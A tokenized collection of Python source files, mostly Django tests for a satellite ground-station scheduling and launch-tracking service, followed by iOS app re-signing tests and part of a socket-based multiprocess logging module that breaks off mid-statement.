assertRaises ( <EOL> Exception , <EOL> launch_jrpc . update , <EOL> self . __leop_id , self . __ufo_id , None , None , None <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . identify ( <EOL> self . __leop_id , self . __ufo_id , <EOL> self . __ufo_callsign , self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . update ( self . __leop_id , self . __ufo_id , None , None , None ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . update ( <EOL> self . __leop_id , self . __ufo_id , <EOL> self . __ufo_callsign , self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . update ( <EOL> self . __leop_id , self . __ufo_id , <EOL> self . __ufo_callsign , self . __leop_2_tle_l1 , self . __leop_2_tle_l2 <EOL> ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_get_configuration ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , launch_jrpc . get_configuration , '<STR_LIT>' <EOL> ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . 
JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ ] <EOL> } <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:1> ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:1>' } <EOL> ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ ] <EOL> } <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:2> ) <EOL> launch_jrpc . identify ( <EOL> self . __leop_id , self . __ufo_id , self . __ufo_callsign , <EOL> self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:2>' } <EOL> ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ { <EOL> launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:1>' , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __ufo_sc_id ) , <EOL> launch_serial . JRPC_K_CALLSIGN : str ( self . __ufo_callsign ) , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . 
__leop_tle_l2 , <EOL> } ] <EOL> } <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> launch_jrpc . forget ( self . __leop_id , self . __ufo_id ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:2>' } , <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:1>' } <EOL> ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ ] <EOL> } <EOL> if self . __verbose_testing : <EOL> misc . print_dictionary ( a_cfg ) <EOL> misc . print_dictionary ( e_cfg ) <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> def test_set_configuration ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , <EOL> launch_jrpc . set_configuration , '<STR_LIT>' , { } <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . set_configuration , self . __leop_id , { } <EOL> ) <EOL> tomorrow = pytz . utc . localize ( <EOL> datetime . datetime . today ( ) + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> ) <EOL> actual_date = launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . date <EOL> self . assertEqual ( <EOL> actual_date . isoformat ( ) , self . __leop_date . isoformat ( ) , <EOL> '<STR_LIT>' + str ( difflib . ndiff ( <EOL> actual_date . isoformat ( ) , self . __leop_date . isoformat ( ) <EOL> ) ) <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . set_configuration ( self . __leop_id , { <EOL> launch_serial . JRPC_K_DATE : str ( tomorrow . isoformat ( ) ) <EOL> } ) , <EOL> self . 
__leop_id , <EOL> '<STR_LIT>' <EOL> ) <EOL> actual_date = launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . date <EOL> self . assertEqual ( <EOL> actual_date . isoformat ( ) , tomorrow . isoformat ( ) , <EOL> '<STR_LIT>' + str ( difflib . ndiff ( <EOL> actual_date . isoformat ( ) , tomorrow . isoformat ( ) <EOL> ) ) <EOL> ) <EOL> old_gt = simulation_models . GroundTrack . objects . get ( tle = self . __leop . tle ) <EOL> self . assertEqual ( <EOL> launch_jrpc . set_configuration ( self . __leop_id , { <EOL> launch_serial . JRPC_K_DATE : str ( tomorrow . isoformat ( ) ) , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_2_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_2_tle_l2 , <EOL> } ) , <EOL> self . __leop_id , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> tle_models . TwoLineElement . objects . filter ( <EOL> first_line = self . __leop_2_tle_l1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> tle_models . TwoLineElement . objects . filter ( <EOL> second_line = self . __leop_2_tle_l2 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> new_gt = simulation_models . GroundTrack . objects . get ( tle = self . __leop . tle ) <EOL> self . assertNotEqual ( old_gt , new_gt , '<STR_LIT>' ) <EOL> def test_get_passes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> launch_jrpc . get_pass_slots ( self . __leop_id ) , <EOL> [ ] , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , [ self . __gs_1_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } , <EOL> '<STR_LIT>' <EOL> ) <EOL> launch_jrpc . add_unknown ( self . __leop_id , self . __ufo_id ) <EOL> launch_jrpc . identify ( <EOL> self . __leop_id , self . __ufo_id , self . __ufo_callsign , <EOL> self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) <EOL> slots = launch_jrpc . 
get_pass_slots ( self . __leop_id ) <EOL> self . assertNotEqual ( <EOL> len ( slots ) , <NUM_LIT:0> , '<STR_LIT>' <EOL> ) <EOL> def test_list_sc ( self ) : <EOL> """<STR_LIT>""" <EOL> launch_jrpc . list_spacecraft ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> def _test_get_messages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , <EOL> messages_jrpc . get_messages , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , messages_jrpc . get_messages , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , messages_jrpc . get_messages , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , messages_jrpc . get_messages , self . __leop_id , '<STR_LIT:null>' <EOL> ) <EOL> self . assertEqual ( <EOL> messages_jrpc . get_messages ( <EOL> self . __leop_id , '<STR_LIT>' <EOL> ) , <EOL> [ ] , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , [ self . __gs_1_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } , <EOL> '<STR_LIT>' <EOL> ) <EOL> message_1 = db_tools . create_message ( self . __gs_1 ) <EOL> yesterday = misc . get_now_utc ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> actual = messages_jrpc . get_messages ( <EOL> self . __leop_id , yesterday . isoformat ( ) <EOL> ) <EOL> expected = [ { <EOL> launch_serial . JRPC_K_GS_ID : self . __gs_1_id , <EOL> messages_serial . JRPC_K_TS : message_1 . groundstation_timestamp , <EOL> messages_serial . JRPC_K_MESSAGE : db_tools . MESSAGE__1_TEST <EOL> } ] <EOL> self . assertEqual ( actual , expected ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , [ self . __gs_2_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> { launch_serial . JRPC_K_LEOP_ID : self . 
__leop_id } , <EOL> '<STR_LIT>' <EOL> ) <EOL> message_2 = db_tools . create_message ( <EOL> self . __gs_2 , message = db_tools . MESSAGE_BASE64 <EOL> ) <EOL> yesterday = misc . get_now_utc ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> actual = messages_jrpc . get_messages ( <EOL> self . __leop_id , yesterday . isoformat ( ) <EOL> ) <EOL> expected . append ( { <EOL> launch_serial . JRPC_K_GS_ID : self . __gs_2_id , <EOL> messages_serial . JRPC_K_TS : message_2 . groundstation_timestamp , <EOL> messages_serial . JRPC_K_MESSAGE : db_tools . MESSAGE_BASE64 . decode ( ) <EOL> } ) <EOL> self . assertEqual ( actual , expected ) </s>
<s> from django . db import models , migrations <EOL> import django . db . models . deletion <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT> , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:start>' , models . DateTimeField ( verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:end>' , models . DateTimeField ( verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:state>' , models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT:10> , verbose_name = b'<STR_LIT>' , choices = [ ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . SET_NULL , verbose_name = b'<STR_LIT>' , blank = True , to = '<STR_LIT>' , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . SET_NULL , verbose_name = b'<STR_LIT>' , blank = True , to = '<STR_LIT>' , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . SET_NULL , verbose_name = b'<STR_LIT>' , blank = True , to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> import logging <EOL> from django import test <EOL> from services . common import helpers as db_tools <EOL> from services . scheduling . jrpc . views import compatibility as compatibility_jrpc <EOL> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> class TestCompatibilityViews ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> if not self . __verbose_testing : <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . CRITICAL ) <EOL> from services . scheduling . signals import compatibility <EOL> self . __gs_1_id = '<STR_LIT>' <EOL> self . __gs_1_ch_1_id = '<STR_LIT>' <EOL> self . __gs_1_ch_2_id = '<STR_LIT>' <EOL> self . __band = db_tools . create_band ( ) <EOL> self . __user_profile = db_tools . create_user_profile ( ) <EOL> self . __gs_1 = db_tools . create_gs ( <EOL> user_profile = self . __user_profile , identifier = self . __gs_1_id , <EOL> ) <EOL> self . __gs_1_ch_1 = db_tools . gs_add_channel ( <EOL> self . __gs_1 , self . __band , self . __gs_1_ch_1_id <EOL> ) <EOL> self . __gs_1_ch_2 = db_tools . gs_add_channel ( <EOL> self . __gs_1 , self . __band , self . __gs_1_ch_2_id <EOL> ) <EOL> self . __sc_1_id = '<STR_LIT>' <EOL> self . __sc_1_ch_1_id = '<STR_LIT>' <EOL> self . __sc_1_ch_1_f = <NUM_LIT> <EOL> self . __sc_1_ch_2_id = '<STR_LIT>' <EOL> self . __sc_1 = db_tools . create_sc ( <EOL> user_profile = self . __user_profile , <EOL> identifier = self . __sc_1_id <EOL> ) <EOL> self . __sc_1_ch_1 = db_tools . sc_add_channel ( <EOL> self . __sc_1 , self . __sc_1_ch_1_f , self . __sc_1_ch_1_id , <EOL> ) <EOL> def test_sc_channel_get_compatible ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __verbose_testing : <EOL> print ( '<STR_LIT>' ) <EOL> c = compatibility_jrpc . sc_channel_get_compatible ( <EOL> self . __sc_1_id , self . __sc_1_ch_1_id <EOL> ) <EOL> self . assertEquals ( c [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . 
__gs_1_id ) <EOL> def test_sc_get_compatible ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __verbose_testing : <EOL> print ( '<STR_LIT>' ) <EOL> r = compatibility_jrpc . sc_get_compatible ( self . __sc_1_id ) <EOL> self . assertEquals ( <EOL> r [ '<STR_LIT>' ] , self . __sc_1_id <EOL> ) <EOL> self . assertEquals ( <EOL> r [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from datetime import timedelta as py_timedelta <EOL> from django import test <EOL> import logging <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> from services . common import misc as sn_misc <EOL> from services . common import helpers as db_tools <EOL> from services . configuration . models import tle as tle_models <EOL> from services . simulation . models import passes as pass_models <EOL> class TestModels ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> self . __user = db_tools . create_user_profile ( ) <EOL> self . __request_1 = db_tools . create_request ( user_profile = self . __user ) <EOL> self . __gs_1_id = '<STR_LIT>' <EOL> self . __gs_1 = db_tools . create_gs ( <EOL> user_profile = self . __user , identifier = self . __gs_1_id <EOL> ) <EOL> self . __sc_1_id = '<STR_LIT>' <EOL> self . __sc_1_tle_id = '<STR_LIT>' <EOL> self . __sc_1 = db_tools . create_sc ( <EOL> user_profile = self . __user , <EOL> identifier = self . __sc_1_id , tle_id = self . __sc_1_tle_id , <EOL> ) <EOL> def test_pass_models ( self ) : <EOL> """<STR_LIT>""" <EOL> sc_slots_1 = pass_models . PassSlots . objects . create_pass_slots_sc ( <EOL> self . __sc_1 <EOL> ) <EOL> self . assertIsNot ( <EOL> len ( sc_slots_1 ) , <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> gs_slots_1 = pass_models . PassSlots . objects . create_pass_slots_gs ( <EOL> self . __gs_1 <EOL> ) <EOL> self . assertIsNot ( <EOL> len ( gs_slots_1 ) , <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> groundstation = self . __gs_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> pass_models . PassSlots . objects . 
remove_pass_slots_sc ( self . __sc_1 ) <EOL> self . assertFalse ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> pass_models . PassSlots . objects . remove_pass_slots_gs ( self . __gs_1 ) <EOL> self . assertFalse ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> groundstation = self . __gs_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_create_passes ( self ) : <EOL> """<STR_LIT>""" <EOL> slot_s = sn_misc . get_next_midnight ( ) <EOL> slot_e = slot_s + py_timedelta ( days = <NUM_LIT:1> ) <EOL> self . assertIsNotNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> self . assertIsNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> slot_s = slot_s + py_timedelta ( days = <NUM_LIT:1> ) <EOL> slot_e = slot_s + py_timedelta ( days = <NUM_LIT:1> ) <EOL> self . assertIsNotNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> self . assertIsNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> def test_firebird ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __tle_fb = tle_models . TwoLineElement . objects . create ( <EOL> '<STR_LIT>' , <EOL> db_tools . ISS_TLE_ID , db_tools . ISS_TLE [ <NUM_LIT:0> ] , db_tools . ISS_TLE [ <NUM_LIT:1> ] <EOL> ) <EOL> self . __sc_fb = db_tools . create_sc ( <EOL> user_profile = self . __user , tle_id = db_tools . ISS_TLE_ID <EOL> ) <EOL> self . __gs_uvigo_id = '<STR_LIT>' <EOL> self . 
__gs_uvigo_e = <NUM_LIT:0> <EOL> self . __gs_uvigo_lat = <NUM_LIT> <EOL> self . __gs_uvigo_lng = - <NUM_LIT> <EOL> self . __gs_uvigo = db_tools . create_gs ( <EOL> user_profile = self . __user , <EOL> identifier = self . __gs_uvigo_id , <EOL> latitude = self . __gs_uvigo_lat , <EOL> longitude = self . __gs_uvigo_lng , <EOL> contact_elevation = self . __gs_uvigo_e <EOL> ) <EOL> def test_passes_reboot ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' ) <EOL> pass_models . PassSlots . objects . propagate ( ) <EOL> sc_passes_n_1 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> pass_models . PassSlots . objects . propagate ( ) <EOL> sc_passes_n_2 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> self . assertEquals ( sc_passes_n_1 , sc_passes_n_2 ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> interval = ( <EOL> sn_misc . get_next_midnight ( ) + py_timedelta ( days = <NUM_LIT:30> ) , <EOL> sn_misc . get_next_midnight ( ) + py_timedelta ( days = <NUM_LIT> ) <EOL> ) <EOL> pass_models . PassSlots . objects . propagate ( interval = interval ) <EOL> sc_passes_n_3 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> self . assertGreater ( sc_passes_n_3 , sc_passes_n_2 ) <EOL> pass_models . PassSlots . objects . propagate ( interval = interval ) <EOL> sc_passes_n_4 = pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . count ( ) <EOL> self . assertEquals ( sc_passes_n_4 , sc_passes_n_3 ) </s>
<s> from isign_base_test import IsignBaseTest <EOL> import os <EOL> from os . path import exists <EOL> from isign import isign <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> class TestPublicInterface ( IsignBaseTest ) : <EOL> def _test_signable ( self , filename , output_path ) : <EOL> self . resign ( filename , output_path = output_path ) <EOL> assert exists ( output_path ) <EOL> assert os . path . getsize ( output_path ) > <NUM_LIT:0> <EOL> self . unlink ( output_path ) <EOL> def _test_unsignable ( self , filename , output_path ) : <EOL> with self . assertRaises ( isign . NotSignable ) : <EOL> self . resign ( filename , output_path = output_path ) <EOL> self . unlink ( output_path ) <EOL> def test_app ( self ) : <EOL> self . _test_signable ( self . TEST_APP , self . get_temp_dir ( ) ) <EOL> def test_app_ipa ( self ) : <EOL> self . _test_signable ( self . TEST_IPA , self . get_temp_file ( ) ) <EOL> def test_app_with_frameworks_ipa ( self ) : <EOL> self . _test_signable ( self . TEST_WITH_FRAMEWORKS_IPA , self . get_temp_file ( ) ) <EOL> def test_non_app_txt ( self ) : <EOL> self . _test_unsignable ( self . TEST_NONAPP_TXT , self . get_temp_file ( ) ) <EOL> def test_non_app_ipa ( self ) : <EOL> self . _test_unsignable ( self . TEST_NONAPP_IPA , self . get_temp_file ( ) ) <EOL> def test_simulator_app ( self ) : <EOL> self . _test_unsignable ( self . TEST_SIMULATOR_APP , self . get_temp_file ( ) ) </s>
<s> import select <EOL> import logging <EOL> import time <EOL> import socket <EOL> import cPickle as pickle <EOL> from multiprocessing import Process , Pipe <EOL> from functools import partial <EOL> try : <EOL> import errno <EOL> except ImportError : <EOL> errno = None <EOL> EINTR = getattr ( errno , '<STR_LIT>' , <NUM_LIT:4> ) <EOL> import monocle <EOL> from monocle import _o , Return , launch <EOL> from monocle . core import Callback <EOL> from monocle . stack . network import add_service , Client <EOL> from monocle . stack . multiprocess import PipeChannel , SocketChannel , get_conn , make_subchannels , Service <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> subproc_formatter = logging . Formatter ( "<STR_LIT>" ) <EOL> @ _o <EOL> def log_receive ( chan ) : <EOL> root = logging . getLogger ( '<STR_LIT>' ) <EOL> while True : <EOL> levelno , msg = yield chan . recv ( ) <EOL> for h in root . handlers : <EOL> h . old_formatter = h . formatter <EOL> h . setFormatter ( subproc_formatter ) <EOL> log . log ( levelno , msg ) <EOL> for h in root . handlers : <EOL> h . setFormatter ( h . old_formatter ) <EOL> class SyncSockChannel ( object ) : <EOL> def __init__ ( self , sock ) : <EOL> self . sock = sock <EOL> def _sendall ( self , data ) : <EOL> while data : <EOL> try : <EOL> r = self . sock . send ( data ) <EOL> except socket . error , e : <EOL> if e . args [ <NUM_LIT:0> ] == EINTR : <EOL> continue <EOL> raise <EOL> data = data [ r : ] <EOL> def _recv ( self , count ) : <EOL> result = "<STR_LIT>" <EOL> while count : <EOL> try : <EOL> data = self . sock . recv ( min ( count , <NUM_LIT> ) ) <EOL> except socket . error , e : <EOL> if e . args [ <NUM_LIT:0> ] == EINTR : <EOL> continue <EOL> raise <EOL> else : <EOL> count -= len ( data ) <EOL> result += data <EOL> return result <EOL> def send ( self , value ) : <EOL> p = pickle . dumps ( value ) <EOL> self . _sendall ( str ( len ( p ) ) ) <EOL> self . _sendall ( "<STR_LIT:\n>" ) <EOL> self . 
_sendall ( p ) <EOL> def recv ( self ) : <EOL> l = "<STR_LIT>" <EOL> while True : <EOL> x = self . _recv ( <NUM_LIT:1> ) <EOL> if x == "<STR_LIT:\n>" : <EOL> break <EOL> l += x <EOL> l = int ( l ) <EOL> p = self . _recv ( l ) <EOL> try : <EOL> value = pickle . loads ( p ) <EOL> except Exception : <EOL> log . exception ( "<STR_LIT>" , p ) <EOL> raise <EOL> return value <EOL> def poll ( self ) : <EOL> r , w , x = select . select ( [ self . sock ] , [ ] , [ self . sock ] , <NUM_LIT:0> ) <EOL> if r + x : <EOL> log . info ( "<STR_LIT>" ) <EOL> return True <EOL> else : <EOL> return False <EOL> class SockChannelHandler ( logging . Handler ) : <EOL> def __init__ ( self , sock ) : <EOL> logging . Handler . __init__ ( self ) <EOL> self . sock = sock <EOL> def setFormatter ( self , formatter ) : <EOL> self . formatter = formatter <EOL> def send ( self , record ) : <EOL> if record . args and isinstance ( record . args , tuple ) : <EOL> args = record . args <EOL> new_args = [ ] <EOL> for arg in args : <EOL> if isinstance ( arg , str ) : <EOL> new_args . append ( arg . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) ) <EOL> else : <EOL> new_args . append ( arg ) <EOL> record . args = tuple ( new_args ) <EOL> self . sock . send ( ( record . levelno , self . formatter . format ( record ) ) ) <EOL> def emit ( self , record ) : <EOL> try : <EOL> self . send ( record ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> self . handleError ( record ) <EOL> def close ( self ) : <EOL> logging . Handler . close ( self ) <EOL> class SyncSockSubchan ( object ) : <EOL> def __init__ ( self , chan , subchan ) : <EOL> self . chan = chan <EOL> self . subchan = subchan <EOL> def send ( self , value ) : <EOL> return self . chan . send ( { '<STR_LIT>' : self . subchan , <EOL> '<STR_LIT:content>' : value } ) <EOL> def recv ( self ) : <EOL> value = self . chan . recv ( ) <EOL> assert value [ '<STR_LIT>' ] == self . 
subchan <EOL> return value [ '<STR_LIT:content>' ] <EOL> def poll ( self ) : <EOL> return self . chan . poll ( ) <EOL> def _wrapper_with_sockets ( target , port , * args , ** kwargs ) : <EOL> sock = socket . socket ( ) <EOL> while True : <EOL> try : <EOL> sock . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" , port , type ( e ) , str ( e ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> sock . close ( ) <EOL> sock = socket . socket ( ) <EOL> else : <EOL> break <EOL> try : <EOL> formatter = logging . Formatter ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> chan = SyncSockChannel ( sock ) <EOL> handler = SockChannelHandler ( SyncSockSubchan ( chan , '<STR_LIT>' ) ) <EOL> handler . setFormatter ( formatter ) <EOL> root = logging . getLogger ( '<STR_LIT>' ) <EOL> root . addHandler ( handler ) <EOL> root . setLevel ( logging . DEBUG ) <EOL> target ( SyncSockSubchan ( chan , '<STR_LIT>' ) , * args , ** kwargs ) <EOL> finally : <EOL> log . info ( "<STR_LIT>" ) <EOL> sock . shutdown ( socket . SHUT_RDWR ) <EOL> sock . close ( ) <EOL> @ _o <EOL> def launch_proc_with_sockets ( target , port , * args , ** kwargs ) : <EOL> args = [ target , port ] + list ( args ) <EOL> p = Process ( target = 